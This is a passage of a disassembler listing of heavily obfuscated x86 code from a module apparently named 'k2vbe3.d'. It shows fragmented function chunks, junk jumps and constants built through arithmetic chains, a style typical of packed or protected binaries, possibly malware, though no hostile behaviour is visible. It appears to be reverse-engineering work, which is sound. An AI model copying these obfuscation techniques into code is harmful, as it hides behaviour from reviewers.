; END OF FUNCTION CHUNK	FOR sub_44945C

; =============== S U B	R O U T	I N E =======================================



sub_448159	proc near		; CODE XREF: sub_44B94B-E9Ep

; FUNCTION CHUNK AT 0043F394 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00441D60 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00443119 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00444F45 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044917B SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004526EF SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	0F4A1BC9Ah
		jmp	loc_4526EF
sub_448159	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		shl	ebx, 1
		jmp	sub_4588E6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443F0D

loc_44816E:				; CODE XREF: sub_443F0D:loc_444AD1j
		push	esi
		mov	esi, edi
		xchg	esi, [esp+0]
		push	ebx
		push	ecx
		mov	eax, esp
		push	0
		jmp	loc_43DE63
; END OF FUNCTION CHUNK	FOR sub_443F0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454CAC

loc_44817F:				; CODE XREF: sub_454CAC+1j
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		xchg	eax, [esp+0]
		mov	ebp, eax
		jmp	loc_44F4F3
; END OF FUNCTION CHUNK	FOR sub_454CAC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_44818E:				; CODE XREF: sub_454E69-4E27j
		jnz	loc_45AD71
		jmp	loc_451546
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------

loc_448199:				; CODE XREF: k2vbe3.d:004511A6j
		call	sub_44AF0C

loc_44819E:				; CODE XREF: k2vbe3.d:00449F9Ej
		jmp	loc_45A8FB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_4481A3:				; CODE XREF: sub_450F71-11879j
					; sub_454AD4:loc_45091Cj
		jmp	loc_4461FD
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------

loc_4481A8:				; CODE XREF: k2vbe3.d:0044BC93j
		xor	eax, ecx

loc_4481AA:				; CODE XREF: k2vbe3.d:loc_44BC85j
		add	eax, 0F02B8B43h
		add	eax, ebp
		add	eax, 0A4FBEEFh
		push	eax
		jmp	loc_4446BC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_4481BE:				; CODE XREF: sub_44C90E+1920j
		push	esi
		push	0C6077765h
		pop	esi
		sub	esi, 777FA90Eh
		add	esi, 0B17831B9h
		jmp	loc_44561C
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

loc_4481D6:				; CODE XREF: k2vbe3.d:0044929Fj
		jle	loc_452B83

; =============== S U B	R O U T	I N E =======================================



sub_4481DC	proc near		; CODE XREF: sub_4508AF:loc_43C930p

; FUNCTION CHUNK AT 00443771 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004444B0 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044950F SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00449516 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044F22D SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	[ebp-0Ah], al

loc_4481E3:				; CODE XREF: sub_4588FD:loc_44D580j
		jz	loc_443771
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0
		jnz	loc_449516
		jmp	loc_4444B0
sub_4481DC	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4481FA	proc near		; CODE XREF: k2vbe3.d:0043D3CAj
					; sub_44B8EF+B76p

; FUNCTION CHUNK AT 0043E52F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043EC00 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043F1A6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441B29 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00443610 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00447261 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004488F5 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044ABE9 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044B906 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E985 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451E16 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00451E3C SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00452B3B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455866 SIZE 00000008 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	eax, 35F0A819h
		mov	eax, [eax]
		or	eax, eax
		jmp	loc_452B3B
sub_4481FA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		or	ebp, 127A9222h
		jmp	loc_44C945

; =============== S U B	R O U T	I N E =======================================



sub_448218	proc near		; CODE XREF: k2vbe3.d:0043E660j
					; sub_444B3E+Bp

; FUNCTION CHUNK AT 0043E9BB SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	ecx, 8A88B9E1h
		add	ecx, ebp
		add	ecx, 8987601Ch
		push	offset loc_452573
		jmp	loc_43E9BB
sub_448218	endp

; ---------------------------------------------------------------------------

loc_448234:				; CODE XREF: k2vbe3.d:0045901Ej
		test	ecx, 0DAAAEB65h
		jmp	loc_43E1D0
; ---------------------------------------------------------------------------
		jbe	sub_45512F
		jmp	sub_44D910
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441409

loc_44824A:				; CODE XREF: sub_441409-25BEj
		jnp	loc_44E2F8

loc_448250:				; CODE XREF: sub_441409:loc_4546E1j
		rol	eax, 13h
		push	offset loc_458541
		jmp	loc_445EED
; END OF FUNCTION CHUNK	FOR sub_441409
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580DF

loc_44825D:				; CODE XREF: sub_4580DF:loc_44D0CBj
		pop	edi
		or	edi, 50F217AAh
		test	edi, 20000000h
		jmp	loc_446A01
; END OF FUNCTION CHUNK	FOR sub_4580DF
; ---------------------------------------------------------------------------
		shl	eax, 15h
		jmp	sub_44921C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_448277:				; CODE XREF: sub_456666-186D9j
		and	ecx, 7
		mov	al, 1
		shl	al, cl
		push	0A6188FFBh
		pop	edx
		rol	edx, 2
		add	edx, 37F927F6h
		jmp	loc_453F8E
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45101A

loc_448292:				; CODE XREF: sub_45101A-132E5j
					; sub_45101A:loc_442B77j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_443A83
		jmp	loc_447C96
; END OF FUNCTION CHUNK	FOR sub_45101A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA1E

loc_4482A3:				; CODE XREF: sub_43DA1E:loc_45BD6Cj
		pop	eax
		or	eax, 0D3F3640h
		jns	loc_4568BF
; END OF FUNCTION CHUNK	FOR sub_43DA1E
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_4482B0:				; CODE XREF: sub_45A323-2D0Cj
		jmp	loc_44EDAC
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------

loc_4482B5:				; CODE XREF: k2vbe3.d:004435CEj
		jmp	loc_442D89
; ---------------------------------------------------------------------------
		cdq
		jmp	loc_4568B9
; ---------------------------------------------------------------------------

loc_4482C0:				; DATA XREF: sub_44D3AB+Do
		push	0FB38F744h
		pop	edx
		or	edx, 19E5E29Fh
		xor	edx, 1ACC1833h
		call	sub_44C224
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_4482D7:				; CODE XREF: sub_43CCD0+108E1j
		jmp	loc_44D562
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451CF1

loc_4482DC:				; CODE XREF: sub_451CF1-13E38j
		jmp	nullsub_465
; END OF FUNCTION CHUNK	FOR sub_451CF1
; ---------------------------------------------------------------------------

loc_4482E1:				; DATA XREF: sub_452D37:loc_44041Fo
		xchg	edi, [esp]
		push	edi
		pop	edx
		xchg	ebp, [esp]
		mov	edi, ebp
		pop	ebp
		jmp	loc_44C0E5
; ---------------------------------------------------------------------------

loc_4482F1:				; CODE XREF: k2vbe3.d:00450573j
		popf

; =============== S U B	R O U T	I N E =======================================



sub_4482F2	proc near		; CODE XREF: sub_44B477:loc_454B56p

; FUNCTION CHUNK AT 0044CEB2 SIZE 0000000D BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	esi
		mov	esi, eax
		xchg	esi, [esp+0]
		jmp	loc_44CEB2
sub_4482F2	endp

; ---------------------------------------------------------------------------

loc_448301:				; CODE XREF: k2vbe3.d:004524B3j
		or	eax, 324A7EC1h
		xor	eax, 3E9A5EF5h
		call	sub_45ADED
; START	OF FUNCTION CHUNK FOR sub_44809D

loc_448312:				; CODE XREF: sub_44809D-67C1j
		jmp	loc_4555AE
; END OF FUNCTION CHUNK	FOR sub_44809D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4575BD

loc_448317:				; CODE XREF: sub_4575BD:loc_44AA57j
		jl	loc_4520E3
; END OF FUNCTION CHUNK	FOR sub_4575BD
; START	OF FUNCTION CHUNK FOR sub_4523BE

loc_44831D:				; CODE XREF: sub_4523BE+C8Fj
		jmp	sub_453347
; END OF FUNCTION CHUNK	FOR sub_4523BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D45F

loc_448322:				; CODE XREF: sub_43D45F+12A83j
		jmp	nullsub_104
; END OF FUNCTION CHUNK	FOR sub_43D45F
; ---------------------------------------------------------------------------
		test	ecx, 65DD9FAAh
		jmp	loc_45430D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4445E2

loc_448332:				; CODE XREF: sub_4445E2+D67Aj
		push	offset loc_444C24
		jmp	loc_45542E
; END OF FUNCTION CHUNK	FOR sub_4445E2
; ---------------------------------------------------------------------------
		xor	edi, esi
		jmp	loc_45A6AF

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_448343	proc near		; CODE XREF: k2vbe3.d:0043F967p

; FUNCTION CHUNK AT 0044A6F8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004526E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453225 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045494B SIZE 00000001 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx

loc_448347:				; CODE XREF: k2vbe3.d:0044FCDAj
		mov	esp, ebp
		xchg	esi, [esp+0]
		jmp	loc_44A6F8
sub_448343	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_448351:				; DATA XREF: sub_44E360+7o
		push	0EF52B251h
		pop	edx
		sub	edx, 17DD08C6h
		js	loc_448EB8
		jnp	locret_43EEE9
		jmp	loc_448EB0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E1E

loc_44836E:				; CODE XREF: sub_446E1E+9A6j
		add	eax, 946F7737h
		mov	eax, [eax]

loc_448376:				; CODE XREF: k2vbe3.d:loc_449CBFj
		push	offset loc_447CED
		jmp	loc_441C4A
; END OF FUNCTION CHUNK	FOR sub_446E1E

; =============== S U B	R O U T	I N E =======================================



sub_448380	proc near		; CODE XREF: sub_444585p
					; k2vbe3.d:loc_450EF1j	...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044EB7A SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0045B4DE SIZE 00000010 BYTES

		xchg	ecx, [esp+0]
		mov	edx, ecx
		pop	ecx
		js	loc_45B4DE
		call	sub_451087

loc_448391:				; CODE XREF: sub_44ADEC+5j
		jmp	nullsub_48
sub_448380	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_448396:				; CODE XREF: k2vbe3.d:00448430j
		jmp	locret_457948
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E204

loc_44839B:				; CODE XREF: sub_43E204+13C6j
		jmp	nullsub_49
; END OF FUNCTION CHUNK	FOR sub_43E204
; ---------------------------------------------------------------------------

locret_4483A0:				; CODE XREF: k2vbe3.d:00442CD0j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B979

loc_4483A1:				; CODE XREF: sub_44B979-71C9j
		jp	loc_45501A
		mov	eax, [edi]
		xor	ecx, 9E27DCA6h
		jmp	loc_451411
; END OF FUNCTION CHUNK	FOR sub_44B979
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_4483B4:				; CODE XREF: sub_45A323:loc_44A9E7j
		sub	esi, ecx
		or	ebp, 0EA243ED5h
		xchg	ebx, [eax]
		not	edi
		jmp	loc_45976F
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
		not	ebx
		jmp	sub_45A1CB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F31

loc_4483CC:				; CODE XREF: sub_442F31+191D0j
		add	ebx, esi
		and	esi, ebx
		jmp	loc_45645B
; END OF FUNCTION CHUNK	FOR sub_442F31
; ---------------------------------------------------------------------------

loc_4483D5:				; CODE XREF: k2vbe3.d:loc_43E85Cj
					; k2vbe3.d:0043E87Ej
		xor	eax, 0FDF93FFFh
		push	esi
		pushf
		push	0D1BA3EBFh
		pop	esi
		jmp	loc_444FC3
; ---------------------------------------------------------------------------
		xchg	ebp, [edx]
		jmp	sub_45329B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F26C

loc_4483EF:				; CODE XREF: sub_43F26C:loc_43F274j
					; sub_44D3A3+1DFEj
		mov	eax, [eax+60h]
		add	eax, [ebp+var_4]
		mov	[ebp+var_14], eax
		mov	eax, [ebp+var_14]
		mov	eax, [eax+18h]
		jmp	loc_43D3AF
; END OF FUNCTION CHUNK	FOR sub_43F26C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442475

loc_448403:				; CODE XREF: sub_442475:loc_44B4DFj
		or	eax, eax
		jnz	loc_45A20E
		jmp	loc_451A2E
; END OF FUNCTION CHUNK	FOR sub_442475
; ---------------------------------------------------------------------------

loc_448410:				; CODE XREF: k2vbe3.d:0045B38Dj
		jle	loc_4466B7
		push	ecx

; =============== S U B	R O U T	I N E =======================================



sub_448417	proc near		; CODE XREF: k2vbe3.d:0044B893p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044341A SIZE 00000018 BYTES

		xchg	edx, [esp-4+arg_0]
		pop	edx
		xchg	ebp, [esp+0]
		push	87198B0Fh
		jmp	loc_44341A
sub_448417	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_448428:				; CODE XREF: k2vbe3.d:loc_43FA80j
		xor	edx, edx
		push	edx
		push	offset loc_43DDC0
		jmp	loc_448396
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C041

loc_448435:				; CODE XREF: sub_45C041:loc_451A57j
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_45408A
		jmp	loc_44BCEE
; END OF FUNCTION CHUNK	FOR sub_45C041
; ---------------------------------------------------------------------------

loc_448444:				; DATA XREF: sub_44F6FD+6o
		push	edx
		push	0AAF79CF4h
		pop	edx
		sub	edx, 2EB0EEB1h
		xor	edx, 4C84FBDCh
		push	offset loc_43F961
		jmp	loc_43FA22
; ---------------------------------------------------------------------------

loc_448461:				; CODE XREF: k2vbe3.d:00443980j
		jnp	loc_450164
		test	eax, 0E409BB3Ah
		jmp	loc_44ACCC

; =============== S U B	R O U T	I N E =======================================



sub_448472	proc near		; CODE XREF: sub_45B20A-1968Ap
					; k2vbe3.d:loc_44E515j	...

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 00442153 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044774D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449EA0 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0045242A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00455240 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459D53 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B0FF SIZE 0000000B BYTES

		xchg	edi, [esp+0]
		pop	edi
		pop	edx
		mov	eax, [esp-8+arg_4]
		push	edx
		call	sub_4599AA
		jmp	loc_44774D
sub_448472	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_448485:				; CODE XREF: sub_4529E2+63C8j
		jnb	sub_458D4F
		xchg	ecx, ebp
		jmp	loc_43C15B
; END OF FUNCTION CHUNK	FOR sub_4529E2
; ---------------------------------------------------------------------------
		push	offset sub_43E2FC
		jmp	locret_4407E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E83

loc_44849C:				; CODE XREF: sub_454E83+B92j
		cdq
		mov	[eax], edx
		mov	ecx, [ebx]

loc_4484A1:				; CODE XREF: k2vbe3.d:loc_457879j
		mov	eax, [ebp+var_8]
		jmp	loc_459B9C
; END OF FUNCTION CHUNK	FOR sub_454E83

; =============== S U B	R O U T	I N E =======================================



sub_4484A9	proc near		; DATA XREF: sub_451759:loc_4409F8o

var_4		= dword	ptr -4

		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+4+var_4]
		call	sub_44F174

loc_4484B4:				; CODE XREF: sub_4496A2+8j
		jmp	sub_451759
sub_4484A9	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45451C

loc_4484B9:				; CODE XREF: sub_45451C-F72Aj
		jmp	nullsub_264
; END OF FUNCTION CHUNK	FOR sub_45451C
; ---------------------------------------------------------------------------

loc_4484BE:				; CODE XREF: k2vbe3.d:0043F317j
		jmp	loc_44C621
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD01

loc_4484C3:				; CODE XREF: sub_43CD01+6FC4j
		push	444D0D51h
		pop	ecx
		and	ecx, 2FBE576Bh
		jns	loc_44BEA9

loc_4484D5:				; CODE XREF: sub_4468FE+1436Aj
		jmp	sub_45B20A
; END OF FUNCTION CHUNK	FOR sub_43CD01
; ---------------------------------------------------------------------------

loc_4484DA:				; CODE XREF: k2vbe3.d:00446067j
		jmp	loc_4485E7
; ---------------------------------------------------------------------------
		shl	esi, 13h
		jmp	loc_44259E
; ---------------------------------------------------------------------------
		test	eax, eax
		jz	loc_445384
		jmp	loc_44CAEE
; ---------------------------------------------------------------------------
		cdq
		jmp	sub_44FBB2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4461D5

loc_4484FA:				; CODE XREF: sub_4461D5+107C0j
		push	offset loc_4544BC
		jmp	nullsub_219
; END OF FUNCTION CHUNK	FOR sub_4461D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457865

loc_448504:				; CODE XREF: sub_457865:loc_454E94j
		add	eax, 4E3920Dh
		xchg	eax, [esp+0]
		jmp	loc_44B70A
; END OF FUNCTION CHUNK	FOR sub_457865

; =============== S U B	R O U T	I N E =======================================



sub_448512	proc near		; DATA XREF: sub_45B27B+3o

; FUNCTION CHUNK AT 0045236C SIZE 0000000B BYTES

		push	ecx
		push	4F92F908h
		pop	ecx
		rol	ecx, 0Dh
		xor	ecx, 0C8E02910h
		cmp	ecx, 0F8FB74BFh
		jmp	loc_45236C
sub_448512	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_44852D:				; CODE XREF: sub_4529E2+490Fj
		sbb	ebx, esi
		xchg	esi, [edi]
		mov	esi, 0B5004BBFh
		add	ebp, esi

loc_448538:				; CODE XREF: sub_4529E2:loc_4572E5j
		xor	eax, ds:4000EDh
		add	eax, 0CCA08D42h
		jmp	loc_44F035
; END OF FUNCTION CHUNK	FOR sub_4529E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454903

loc_448549:				; CODE XREF: sub_454903-1828Aj
		rol	eax, 15h
		add	eax, 3720C916h
		rol	eax, 1Bh
		jmp	loc_440EBC
; END OF FUNCTION CHUNK	FOR sub_454903
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEBE

loc_44855A:				; CODE XREF: sub_43DEBEj
		mov	eax, ds:dword_453E90
		or	eax, eax
		jmp	loc_456B5D
; END OF FUNCTION CHUNK	FOR sub_43DEBE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_448567:				; CODE XREF: sub_44C90E:loc_44A50Fj
		jz	loc_4472C4
		jmp	loc_456013
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FCA0

loc_448572:				; CODE XREF: k2vbe3.d:loc_442A27j
					; sub_43FCA0:loc_443A8Bj
		jz	loc_451CE5
		jmp	loc_44C42B
; END OF FUNCTION CHUNK	FOR sub_43FCA0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_405. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44857E:				; CODE XREF: k2vbe3.d:004495C8j
					; k2vbe3.d:loc_44A90Bj
		jmp	loc_448A1C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_448583:				; CODE XREF: sub_4529E2:loc_449BE4j
		mov	[ebp-4], eax
		cmp	dword ptr [ebp-4], 0
		jnz	loc_44EFF6
		jmp	loc_4437E5
; END OF FUNCTION CHUNK	FOR sub_4529E2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_43. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_448596:				; CODE XREF: k2vbe3.d:0045267Ej
		jmp	locret_450A1F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FB9B

loc_44859B:				; CODE XREF: sub_43FB9B-CA7j
		jmp	loc_44308C
; END OF FUNCTION CHUNK	FOR sub_43FB9B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45512F

loc_4485A0:				; CODE XREF: sub_45512F:loc_449B26j
		jge	loc_443702
		mov	ecx, [esi]
		jmp	loc_43F59B
; END OF FUNCTION CHUNK	FOR sub_45512F
; ---------------------------------------------------------------------------

loc_4485AD:				; DATA XREF: sub_44E0F6-BB16o
		add	eax, ebp
		add	eax, 0D22220A4h
		push	eax
		call	sub_45A323
		push	eax
		jmp	loc_444C83
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_69. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4485C2:				; CODE XREF: k2vbe3.d:loc_44C089j
		xor	esi, 2C7CDF21h
		sub	esi, 0B48F9C4Fh
		and	esi, 1FB3666Bh
		sub	esi, 0CAEC54CCh
		add	esi, 0C7FB138Fh
		mov	[esi], eax
		jmp	loc_444B70
; ---------------------------------------------------------------------------

loc_4485E7:				; CODE XREF: k2vbe3.d:loc_4484DAj
		push	3C0DD6C0h
		pop	ebx
		rol	ebx, 2
		add	ebx, 100C7D51h
		xchg	ebx, [esp]
		jmp	loc_456A5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_4485FE:				; CODE XREF: sub_4467A1:loc_445636j
		rol	ebx, 19h
		add	ebx, 0F4336A34h
		popf
		xchg	ebx, [esp+0]
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_4467A1
; ---------------------------------------------------------------------------
		sbb	ebp, 0E74142C0h
		rol	edx, 0Ah
		jmp	sub_442C22
; ---------------------------------------------------------------------------

loc_44861E:				; DATA XREF: k2vbe3.d:0044AC3Ao
		call	sub_4553CC
		push	esi
		push	8452FE20h
		pop	esi
		rol	esi, 11h
		jmp	loc_44A5F1
; ---------------------------------------------------------------------------
		xor	edi, 1BD48BBAh
		jmp	loc_45BB86

; =============== S U B	R O U T	I N E =======================================



sub_44863D	proc near		; CODE XREF: k2vbe3.d:0044A970j
					; sub_44B979+F8E6p

; FUNCTION CHUNK AT 00448A62 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0044A7BD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FBEE SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00453DA7 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00456CAC SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045A8AF SIZE 0000001E BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	ebx
		push	45C3F8B5h
		pop	ebx
		rol	ebx, 18h
		add	ebx, 6FC887h
		call	sub_458725

loc_448656:				; CODE XREF: sub_458746+Ej
		jmp	loc_45A8AF
sub_44863D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455D20

loc_44865B:				; CODE XREF: sub_455D20+9j
		jmp	sub_44FF97
; END OF FUNCTION CHUNK	FOR sub_455D20
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_448660:				; CODE XREF: sub_43C865+4239j
		jmp	nullsub_3
; END OF FUNCTION CHUNK	FOR sub_43C865
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C82E

loc_448665:				; CODE XREF: sub_43C82E+2AF4j
		jmp	loc_44E43C
; END OF FUNCTION CHUNK	FOR sub_43C82E

; =============== S U B	R O U T	I N E =======================================



sub_44866A	proc near		; DATA XREF: sub_44660F+BA97o

; FUNCTION CHUNK AT 0043F6FF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004410EB SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044121E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004414BB SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00442D42 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004430D9 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004435FC SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00444240 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004445B5 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00444884 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445424 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00447DDE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448C42 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044C1D3 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00450F95 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00454941 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004570B5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004582D1 SIZE 0000000C BYTES

		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_43F6FF
		jmp	loc_454941
sub_44866A	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44867C	proc near		; CODE XREF: sub_44416D:loc_45868Ej
		push	ebp
		mov	eax, [ebp-20h]
		call	sub_44071B
		pop	ecx

loc_448686:				; CODE XREF: sub_45A4D8:loc_43D523j
		mov	[ebp-20h], eax
		jmp	loc_44555B
sub_44867C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AA57

loc_44868E:				; CODE XREF: sub_45AA57+7j
		mov	ebp, esp
		add	esp, 0FFFFFFECh
		push	offset sub_44C6CA
		jmp	nullsub_384
; END OF FUNCTION CHUNK	FOR sub_45AA57

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_44869D	proc near		; CODE XREF: sub_44111E:loc_4463B3j
		retn
sub_44869D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44869E:				; CODE XREF: sub_45A323+12Dj
		jmp	loc_4531C4
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_4486A3:				; CODE XREF: sub_44B94B-B737j
		jmp	loc_45470C
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BC98

loc_4486A8:				; CODE XREF: sub_45BC98:loc_450D0Aj
		xor	eax, 0A0984C27h
		mov	edx, [esp+0]
		push	eax
		mov	eax, edx
		call	sub_43E135
		jmp	loc_44BD8D
; END OF FUNCTION CHUNK	FOR sub_45BC98
; ---------------------------------------------------------------------------

loc_4486BE:				; CODE XREF: k2vbe3.d:0044F5B3j
		jnz	loc_44CD1E
		jmp	loc_44764B
; ---------------------------------------------------------------------------

loc_4486C9:				; DATA XREF: sub_456208:loc_451384o
		pop	ecx
		mov	esp, ebp
		pop	ebp
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_4486CE:				; CODE XREF: k2vbe3.d:00441CE0j
					; sub_44ED3C+9j
		mov	byte ptr [ebp-5], 0
		jmp	loc_4563EE
; END OF FUNCTION CHUNK	FOR sub_44ED3C

; =============== S U B	R O U T	I N E =======================================



sub_4486D7	proc near		; CODE XREF: sub_440D6A+4p
					; k2vbe3.d:0044D432p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044018C SIZE 00000005 BYTES
